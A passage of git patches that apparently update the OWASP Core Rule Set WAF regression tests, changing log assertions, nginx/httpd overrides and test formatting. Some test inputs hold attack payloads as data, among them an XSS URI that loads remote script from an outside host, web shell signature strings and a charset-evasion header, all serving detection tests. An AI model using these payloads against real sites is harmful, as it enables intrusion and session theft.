a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -23,7 +23,8 @@ tests: data: |- {"body": "

.:NCC:. Shell v"} output: - log_contains: "id \"955100\"" + log: + expect_ids: [955100] - test_id: 2 desc: "Matching web shell Simple PHP backdoor" stages: @@ -43,7 +44,8 @@ tests: data: |- {"body": ""} output: - log_contains: "id \"955100\"" + log: + expect_ids: [955100] - test_id: 3 desc: "Matching web shell WinX Shell" stages: @@ -63,4 +65,5 @@ tests: data: |- {"body": "-:[GreenwooD]:- WinX Shell"} output: - log_contains: "id \"955100\"" + log: + expect_ids: [955100] diff --git a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml index 8a95998fd..699a250f3 100644 --- a/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml +++ b/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955260.yaml @@ -21,4 +21,5 @@ tests: uri: "/reflect" data: "{\"body\": \"\\n\\nRu24PostWebShell -\"}" output: - log_contains: "id \"955260\"" + log: + expect_ids: [955260] diff --git a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml index 9f1457ae6..08d07373a 100644 --- a/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml +++ b/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml @@ -26,7 +26,8 @@ tests: uri: "/reflect" data: "{\"body\": \"<?php echo \\\"Hello World!\\n\\\" ?>\"}" output: - log_contains: "id \"959100\"" + log: + expect_ids: [959100] - test_id: 2 desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered stages: @@ -46,7 +47,8 @@ tests: data: |- {"body": "<?php12345"} output: - no_log_contains: "id \"959100\"" + log: + no_expect_ids: [959100] - test_id: 3 desc: Test is basically identical to 959100-1 (see above) but here we assert that the scores are summed up and reported properly stages: diff --git a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml index 2f454e790..44461a0e3 100644 --- a/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml +++ b/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml @@ -32,7 +32,8 @@ tests: # Retry the test once if it fails to work around this issue. # See https://github.com/coreruleset/go-ftw/issues/141. retry_once: true - log_contains: "id \"980170\"" + log: + expect_ids: [980170] - test_id: 2 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked stages: @@ -52,7 +53,8 @@ tests: # Retry the test once if it fails to work around this issue. # See https://github.com/coreruleset/go-ftw/issues/141. retry_once: true - log_contains: "id \"980170\"" + log: + expect_ids: [980170] - test_id: 3 desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is not logged that did not score stages: @@ -67,8 +69,9 @@ tests: uri: "/get" version: "HTTP/1.1" output: - # Phase 5 rules are prone to a race condition when parsing log output. + # Phase 5 rules are prone to a race condition when parsing log output. # Retry the test once if it fails to work around this issue. # See https://github.com/coreruleset/go-ftw/issues/141. retry_once: true - no_log_contains: "id \"980170\"" + log: + no_expect_ids: [980170] From 0cf921b1fc1d2e547c1db0412a5f054b10ce0ab0 Mon Sep 17 00:00:00 2001 From: Max Leske <maxleske@gmail.com> Date: Sun, 5 May 2024 21:53:58 +0200 Subject: [PATCH 10/18] chore: clean up overrides --- tests/regression/coraza-overrides.yaml | 1 - tests/regression/httpd-overrides.yaml | 27 ++++- tests/regression/nginx-overrides.yaml | 113 ++++++++++++++---- .../REQUEST-913-SCANNER-DETECTION/913100.yaml | 1 - .../920100.yaml | 4 +- .../920120.yaml | 2 +- .../920171.yaml | 78 ++++++------ .../920270.yaml | 3 - .../920274.yaml | 4 - .../920290.yaml | 9 +- .../920300.yaml | 1 - .../920360.yaml | 1 - .../920430.yaml | 10 +- .../920440.yaml | 1 - .../920480.yaml | 25 ++-- .../920490.yaml | 2 +- .../920540.yaml | 4 +- .../920620.yaml | 9 +- .../REQUEST-921-PROTOCOL-ATTACK/921110.yaml | 1 - .../REQUEST-921-PROTOCOL-ATTACK/921130.yaml | 1 - .../REQUEST-921-PROTOCOL-ATTACK/921180.yaml | 5 +- .../930110.yaml | 6 +- .../930120.yaml | 1 - .../930130.yaml | 1 - .../931100.yaml | 1 - .../931110.yaml | 1 - .../931120.yaml | 1 - .../931130.yaml | 1 - .../931131.yaml | 1 - .../932120.yaml | 1 - .../932125.yaml | 1 - .../932130.yaml | 1 - .../932131.yaml | 1 - .../932160.yaml | 1 - .../932200.yaml | 3 +- .../932236.yaml | 3 +- .../932239.yaml | 3 +- .../932260.yaml | 1 - .../933100.yaml | 1 - .../933110.yaml | 1 - .../933111.yaml | 1 - .../933120.yaml | 4 +- .../933130.yaml | 1 - .../933131.yaml | 1 - .../933140.yaml | 1 - .../933150.yaml | 1 - .../933151.yaml | 1 - .../933160.yaml | 3 +- .../933161.yaml | 1 - .../933170.yaml | 1 - .../933180.yaml | 1 - .../933190.yaml | 1 - .../933200.yaml | 1 - .../934100.yaml | 35 ------ .../934101.yaml | 5 +- .../934130.yaml | 3 +- .../934140.yaml | 1 - .../934150.yaml | 1 - .../934160.yaml | 5 +- .../941100.yaml | 1 - .../941101.yaml | 1 - .../941110.yaml | 1 - .../941120.yaml | 1 - .../941130.yaml | 1 - .../941140.yaml | 1 - .../941150.yaml | 1 - .../941160.yaml | 1 - .../941170.yaml | 1 - .../941180.yaml | 1 - .../941181.yaml | 1 - .../941190.yaml | 1 - .../941200.yaml | 1 - .../941210.yaml | 2 +- .../941230.yaml | 1 - .../941240.yaml | 1 - .../941250.yaml | 1 - .../941260.yaml | 1 - .../941270.yaml | 1 - .../941280.yaml | 1 - .../941290.yaml | 1 - .../941300.yaml | 1 - .../941320.yaml | 1 - .../941330.yaml | 1 - .../941340.yaml | 1 - .../941350.yaml | 1 - .../941360.yaml | 1 - .../941370.yaml | 1 - .../941380.yaml | 1 - .../941390.yaml | 1 - .../941400.yaml | 1 - .../942120.yaml | 1 - .../942130.yaml | 1 - .../942140.yaml | 1 - .../942160.yaml | 1 - .../942170.yaml | 1 - .../942180.yaml | 1 - .../942190.yaml | 1 - .../942200.yaml | 1 - .../942210.yaml | 2 +- .../942220.yaml | 2 - .../942230.yaml | 1 - .../942240.yaml | 1 - .../942250.yaml | 4 +- .../942251.yaml | 2 +- .../942260.yaml | 2 +- .../942270.yaml | 2 +- .../942280.yaml | 2 +- .../942290.yaml | 2 +- .../942300.yaml | 2 +- .../942310.yaml | 2 +- .../942320.yaml | 2 +- .../942321.yaml | 1 + .../942330.yaml | 2 +- .../942340.yaml | 2 +- .../942350.yaml | 2 +- .../942360.yaml | 2 +- .../942361.yaml | 2 +- .../942362.yaml | 2 +- .../942370.yaml | 3 +- .../942380.yaml | 2 +- .../942390.yaml | 2 +- .../942400.yaml | 2 +- .../942410.yaml | 2 +- .../942420.yaml | 2 +- .../942421.yaml | 2 +- .../942430.yaml | 2 +- .../942431.yaml | 2 +- .../942432.yaml | 2 +- .../942440.yaml | 2 +- .../942450.yaml | 2 +- .../942460.yaml | 2 +- .../942470.yaml | 2 +- .../942480.yaml | 18 +-- .../942490.yaml | 2 +- .../942510.yaml | 2 +- .../942511.yaml | 2 +- .../943100.yaml | 2 +- .../943110.yaml | 2 +- .../943120.yaml | 2 +- .../944130.yaml | 1 - .../944140.yaml | 2 +- .../944150.yaml | 6 +- .../944151.yaml | 4 +- .../944152.yaml | 4 +- .../944210.yaml | 1 - .../944240.yaml | 1 - .../944250.yaml | 1 - .../944260.yaml | 1 - .../944300.yaml | 91 -------------- .../949110.yaml | 3 +- .../951110.yaml | 1 - .../951120.yaml | 1 - .../951130.yaml | 1 - .../951140.yaml | 1 - .../951160.yaml | 1 - .../951170.yaml | 1 - .../951180.yaml | 1 - .../951190.yaml | 1 - .../951200.yaml | 1 - .../951210.yaml | 1 - .../951220.yaml | 1 - .../951230.yaml | 1 - .../951240.yaml | 1 - .../951250.yaml | 1 - .../951260.yaml | 1 - .../953100.yaml | 1 - .../953101.yaml | 1 - .../953120.yaml | 1 - .../954100.yaml | 1 - .../954120.yaml | 2 +- .../tests/RESPONSE-955-WEB-SHELLS/955100.yaml | 1 - .../tests/RESPONSE-955-WEB-SHELLS/955260.yaml | 2 +- .../959100.yaml | 3 +- .../RESPONSE-980-CORRELATION/980170.yaml | 4 +- .../tests/positivetest-light.yaml.skeleton | 36 ++++-- .../tests/positivetest.yaml.skeleton | 51 +++++--- 176 files changed, 319 insertions(+), 452 deletions(-) diff --git a/tests/regression/coraza-overrides.yaml b/tests/regression/coraza-overrides.yaml index 9d5a8b7f9..39373d99f 100644 --- a/tests/regression/coraza-overrides.yaml +++ b/tests/regression/coraza-overrides.yaml @@ -43,7 +43,6 @@ test_overrides: output: status: 505 log: - expect_ids: [] no_expect_ids: [920430] - rule_id: 932200 test_ids: [13] diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml index 8f42ffa6e..8e39a7abc 100644 --- a/tests/regression/httpd-overrides.yaml +++ b/tests/regression/httpd-overrides.yaml @@ -5,8 +5,31 @@ meta: annotations: - purpose: "CRS test suite" test_overrides: + - rule_id: 920360 + test_ids: [1] + reason: Requires ARG_NAME_LENGTH to be set to an appropriately low value + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920370 + test_ids: [1] + reason: Exceeds PCRE limits + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920380 + test_ids: [1] + reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value + output: + status: 200 + log: + no_expect_ids: [920280] - rule_id: 920390 test_ids: [1] - reason: 'Exceeds PCRE limits' + reason: Exceeds PCRE limits output: - expect_error: true + status: 200 + log: + no_expect_ids: [920390] diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml index cb2cd55c4..1c40df533 100644 --- a/tests/regression/nginx-overrides.yaml +++ b/tests/regression/nginx-overrides.yaml @@ -13,9 +13,14 @@ test_overrides: status: 400 - rule_id: 920100 test_ids: [8] - reason: "On Apache is not allowed to put a colon in the path. Nginx, on the other hand, allows it and, in this case, returns a 404. /index.html:80?I=Like&Apples=Today#tag" + reason: | + On Apache is not allowed to put a colon in the path. + Nginx, on the other hand, allows it, in this case, returns a 200. /index.html:80?I=Like&Apples=Today#tag. + Note that the colon is a legal character in a regular path segment, according to the RFC. output: - status: 404 + status: 200 + log: + no_expect_ids: [920100] - rule_id: 920100 test_ids: [14] reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules." @@ -32,6 +37,15 @@ test_overrides: reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" output: status: 400 + - rule_id: 920260 + test_ids: [1, 3] + reason: | + Nginx replaces the `%u` in the URI with `\xf`. This might be a bug. + See https://github.com/owasp-modsecurity/ModSecurity/issues/3135 + output: + status: 200 + log: + no_expect_ids: [920260] - rule_id: 920270 test_ids: [4] reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule" @@ -39,20 +53,70 @@ test_overrides: status: 200 log: expect_ids: [920270] + - rule_id: 920274 + test_ids: [1] + reason: "Nginx will accept the value for the Host header, the rule should trigger" + output: + status: 200 + log: + expect_ids: [920274] - rule_id: 920290 test_ids: [4] reason: "Nginx returns 400 if Host header is missing" output: status: 400 + - rule_id: 920360 + test_ids: [1] + reason: Requires ARG_NAME_LENGTH to be set to an appropriately low value + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920370 + test_ids: [1] + reason: Exceeds PCRE limits + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920380 + test_ids: [1] + reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value + output: + status: 200 + log: + no_expect_ids: [920280] + - rule_id: 920390 + test_ids: [1] + reason: Exceeds PCRE limits + output: + status: 200 + log: + no_expect_ids: [920390] - rule_id: 920430 test_ids: [8] reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code." output: status: 505 - - rule_id: 932200 - test_ids: [13] - reason: "TODO: the log file contains MATCHED_VAR instead of the macro expansion result" + - rule_id: 920610 + test_ids: [2] + reason: "nginx happily accepts fragments" + output: + status: 200 + log: + expect_ids: [920610] + - rule_id: 920620 + test_ids: [1] + reason: "nginx retains multiple separate Content-Type headers, which is what this rule is looking for" + output: + log: + expect_ids: [920620] + - rule_id: 930110 + test_ids: [7] + reason: "nginx does not strip the dots from the URL (which http apparently does), hence ModSecurity sees them and the rule matches" output: + log: + expect_ids: [930110] - rule_id: 933110 test_ids: [3, 13, 14, 20, 21, 22, 24, 25, 26, 27] reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" @@ -69,43 +133,46 @@ test_overrides: reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" output: expect_error: true - - rule_id: 941180 - test_ids: [7] - reason: "Rule remove by range doesn't work on v3 if used via ctl. https://github.com/coreruleset/coreruleset/pull/3302" - output: - expect_error: true - rule_id: 942131 test_ids: [3, 5, 7] reason: "v3 log bug, the first part of the chain always produces a log" output: - expect_error: true - - rule_id: 942550 - test_ids: [26, 28, 30, 32] - reason: "Seems like libmodsecurity3 cuts the substring after '?' if it contains from target `REQUEST_FILENAME`" - output: - expect_error: true + log: + expect_ids: [942131] - rule_id: 944100 test_ids: [11, 12, 15, 16] - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" + reason: "`REQUEST_BODY` is always present, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" output: - expect_error: true + log: + expect_ids: [944100] + - rule_id: 944110 + test_ids: [11, 12, 15, 16] + reason: "`REQUEST_BODY` is always present, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" + output: + log: + expect_ids: [944110] - rule_id: 944120 test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126] reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" output: - expect_error: true + log: + expect_ids: [944120] - rule_id: 944140 test_ids: [3, 8] - reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" + reason: "The header name `X_Filename` is considered invalid and is removed by nginx" output: - expect_error: true + status: 200 + log: + no_expect_ids: [944140] - rule_id: 944210 test_ids: [6, 7, 23, 24, 40, 41] reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" output: - expect_error: true + log: + expect_ids: [944210] - rule_id: 980170 test_ids: [1, 2] reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170" output: - expect_error: true + log: + no_expect_ids: [980170] diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index 573fce3c6..9dd14be72 100644 --- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 3dc6d556b..74d0073f8 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml @@ -194,7 +194,7 @@ tests: Keep-Alive: '300' Proxy-Connection: keep-alive User-Agent: "OWASP CRS test agent" - method: " GET" + method: "\tGET" port: 80 uri: "/get" version: HTTP/1.1 @@ -242,7 +242,7 @@ tests: dest_addr: 127.0.0.1 method: GET port: 80 - uri: '/get/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\"script\\");x.src = \\"//sdl.me/popup.js?//\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//' + uri: '/get/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//' headers: User-Agent: "OWASP CRS test agent" Host: localhost diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml index 69d2d96be..703b8f78f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml @@ -55,7 +55,7 @@ tests: Content-Disposition: form-data; name="fi=le"; filename="test" Content-Type: text/plain - email: security@example.com + email: security@example.com -----------------------------627652292512397580456702590 Content-Disposition: form-data; name="note" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml index e1e68b7d8..dbd5fe977 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml @@ -11,19 +11,19 @@ tests: dest_addr: "127.0.0.1" port: 80 # this sends a chunked POST request with content "Hi CRS" in two lines - # POST / HTTP/1.1 - # Accept: */* - # Host: localhost - # Transfer-Encoding: chunked - # User-Agent: "OWASP CRS test agent" - # - # 3 - # Hi - # 3 - # CRS - # 0 - # - encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" + # POST / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" output: log: no_expect_ids: [920171] @@ -34,19 +34,19 @@ tests: dest_addr: "127.0.0.1" port: 80 # this sends a chunked GET request with content "Hi CRS" in two lines - # GET / HTTP/1.1 - # Accept: */* - # Host: localhost - # Transfer-Encoding: chunked - # User-Agent: "OWASP CRS test agent" - # - # 3 - # Hi - # 3 - # CRS - # 0 - # - encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQozDQpIaSANCjMNCkNSUw0KMA0KDQo=" + # GET / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVu\nY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQoz\nDQpIaSANCjMNCkNSUw0KMA0KDQo=" output: log: expect_ids: [920171] @@ -57,19 +57,19 @@ tests: dest_addr: "127.0.0.1" port: 80 # this sends a chunked HEAD request with content "Hi CRS" in two lines - # HEAD / HTTP/1.1 - # Accept: */* - # Host: localhost - # Transfer-Encoding: chunked - # User-Agent: "OWASP CRS test agent" - # - # 3 - # Hi - # 3 - # CRS - # 0 - # - encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" + # HEAD / HTTP/1.1\r + # Accept: */*\r + # Host: localhost\r + # Transfer-Encoding: chunked\r + # User-Agent: "OWASP CRS test agent"\r + # \r + # 3\r + # Hi \r + # 3\r + # CRS\r + # 0\r + # \r + encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1F\nbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0K\nMw0KSGkgDQozDQpDUlMNCjANCg0K" output: log: expect_ids: [920171] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index c962b7cb2..5ddeb17d6 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml @@ -46,9 +46,6 @@ tests: log: expect_ids: [920270] - test_id: 4 - desc: | - This causes apache to error before it gets to CRS. Therefore, - we'll mark this as a status 400 now until the FTW OR output is added stages: - input: dest_addr: "127.0.0.1" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml index bcd73842f..5c6752cea 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920274.yaml @@ -4,10 +4,6 @@ meta: rule_id: 920274 tests: - test_id: 1 - desc: | - Apache will just error on this and return 400, as a result we look for forbidden or 400. - In the future FTW should support OR versus AND output. - https://github.com/coreruleset/ftw/issues/19 stages: - input: dest_addr: "127.0.0.1" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml index 04b8eac71..a972412b5 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920290.yaml @@ -54,14 +54,9 @@ tests: - input: dest_addr: "127.0.0.1" port: 80 + version: "HTTP/1.1" + uri: "/get" encoded_request: "R0VUIC8gSFRUUC8xLjANCkhvc3Q6DQoNCg==" - # Request: - # - # GET / HTTP/1.0 - # Host: - # - # CRS prefers the use of encoded_request over raw_request. - # Known reason is encoding issues with raw_request. output: log: expect_ids: [920290] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml index ca5d84fbb..74db85b94 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920300.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: Request Missing an Accept Header (920300) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml index 3c3da7b19..7f5384198 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920360.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None # ARG_NAME_LENGTH needs to be set in crs-config rule_id: 920360 tests: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml index 21b412ddb..cbfbb6eff 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920430.yaml @@ -58,10 +58,11 @@ tests: output: log: no_expect_ids: [920430] - - # Currently FTW won't process HTTP 1.0 simple response items - # This request generates such a response, so even though it will - # generate the alert, it will error. - test_id: 5 + - test_id: 5 + desc: | + Request line without version will be interpreted as HTTP/0.9. + Note that go-ftw currently can't handle the generated response though and + will see a premature EOF. stages: - input: dest_addr: "127.0.0.1" @@ -74,6 +75,7 @@ tests: uri: "/" output: expect_error: true + expect_ids: [920430] - test_id: 6 stages: - input: diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml index bc8950b96..48cf6f7a5 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920440.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: None tests: - test_id: 1 desc: URL file extension is restricted by policy (920440) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml index 3d18bfad0..6999af956 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920480.yaml @@ -225,7 +225,7 @@ tests: # version: "HTTP/1.1" # output: # log: - # epxect_ids:: [920480] + # epxect_ids:: [920480] - test_id: 7 stages: - input: @@ -301,10 +301,10 @@ tests: port: 80 method: "POST" headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - # double charset may cause evasion - Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" + User-Agent: "OWASP CRS test agent" + Host: "localhost" + # double charset may cause evasion + Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" data: "test=value" version: "HTTP/1.1" output: @@ -338,12 +338,12 @@ tests: # User-Agent: "OWASP CRS test agent" # Host: "localhost" # Content-Type: "application/x-www-form-urlencoded;charset=ibm037;charset=UTF-8" #double charset may cause evasion - # uri: "/" - # data: "test=value" - # version: "HTTP/1.1" - # output: - # log: - # expect_ids: [920480] + # uri: "/" + # data: "test=value" + # version: "HTTP/1.1" + # output: + # log: + # expect_ids: [920480] - test_id: 14 stages: - input: @@ -353,7 +353,6 @@ tests: headers: User-Agent: "OWASP CRS test agent" Host: "localhost" - # random other IBM charset Content-Type: "application/x-www-form-urlencoded; charset=\"utf-8\"" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" @@ -371,7 +370,6 @@ tests: headers: User-Agent: "OWASP CRS test agent" Host: "localhost" - # random other IBM charset Content-Type: "application/x-www-form-urlencoded; charset='utf-8'" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" @@ -389,7 +387,6 @@ tests: headers: User-Agent: "OWASP CRS test agent" Host: "localhost" - # random other IBM charset Content-Type: "application/x-www-form-urlencoded; charset=\"garbage\"" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml index 33745cc40..95cc9b70c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920490.yaml @@ -11,7 +11,7 @@ tests: port: 80 method: "POST" headers: - # User-Agent must starts with "UP" + # User-Agent must start with "UP" User-Agent: "UP OWASP CRS test agent" Host: "localhost" Content-Type: "application/x-www-form-urlencoded; charset=utf-8" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml index 2e2f57606..1f3195ea7 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920540.yaml @@ -5,7 